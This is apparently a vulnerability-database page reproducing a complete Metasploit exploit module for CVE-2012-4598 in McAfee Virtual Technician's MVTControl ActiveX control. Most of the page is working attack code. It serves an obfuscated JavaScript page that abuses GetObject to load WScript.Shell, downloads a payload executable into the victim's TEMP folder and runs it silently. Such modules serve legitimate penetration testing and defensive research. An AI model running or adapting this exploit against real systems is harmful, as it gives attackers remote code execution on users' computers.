Lucene search
K

McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability

🗓️ 30 Apr 2012 21:23:52Reported by rgod, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 29 Views

McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability allows remote code execution under user contex

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-4598
30 Apr 201200:00
circl
Check Point Advisories
McAfee Virtual Technician ActiveX Control Insecure Method Code Execution (CVE-2012-4598)
23 Sep 201200:00
checkpoint_advisories
CVE
CVE-2012-4598
22 Aug 201210:00
cve
Cvelist
CVE-2012-4598
22 Aug 201210:00
cvelist
Tenable Nessus
McAfee Virtual Technician ActiveX Control GetObject() Method Remote Command Execution (SB10028)
29 Aug 201200:00
nessus
NVD
CVE-2012-4598
22 Aug 201210:42
nvd
Prion
Code injection
22 Aug 201210:42
prion
RedhatCVE
CVE-2012-4598
22 May 202505:38
redhatcve
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in McAfee Virtual Technician's
        MVTControl.  This ActiveX control can be abused by using the GetObject() function
        to load additional unsafe classes such as WScript.Shell, therefore allowing remote
        code execution under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod',   #Initial discovery, Poc
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2012-4598' ],
          [ 'OSVDB', '81657'],
          [ 'EDB', '18805' ],
          [ 'URL', 'https://kc.mcafee.com/corporate/index?page=content&id=SB10028' ]
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00",
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC'         => "none",
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-04-30',
      'DefaultTarget'  => 0))
  end

  def exploit
    @payload_name = rand_text_alpha(rand(6) + 5) + ".exe"
    super
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']

    if agent !~ /MSIE \d/
      print_error("Browser not supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    if request.uri =~ /\.exe$/
      return if ((p=regenerate_payload(cli))==nil)
      data = generate_payload_exe({:code=>p.encoded})
      print_status("Sending payload")
      send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
      return
    end

    # <object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj'></object>
    js = <<-JS
    var obj = new ActiveXObject("MVT.MVTControl.6300");

    var ws  = obj.GetObject("WScript.Shell");
    var ado = obj.GetObject("ADODB.Stream");
    var e   = ws.Environment("Process");
    var url = document.location + "/#{@payload_name}";
    var tmp = e.Item("TEMP") + "\\\\#{@payload_name}";

    var xml = new ActiveXObject("Microsoft.XMLHTTP");
    xml.open("GET", url, false);
    xml.send(null);
    res = xml.responseBody;

    ado.Type = 1;
    ado.Mode = 3;
    ado.Open();
    ado.Write(res);
    ado.SaveToFile(tmp);
    ws.Run(tmp, 0);
    JS

    js = ::Rex::Exploitation::JSObfu.new(js)
    js.obfuscate(memory_sensitive: true)

    html = <<-EOS
    <html>
    <head>
    </head>
    <body>
    <script defer=defer>
    #{js}
    </script>
    </body>
    </html>
    EOS

    print_status("Sending html")
    send_response(cli, html, {'Content-Type'=>'text/html'})

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation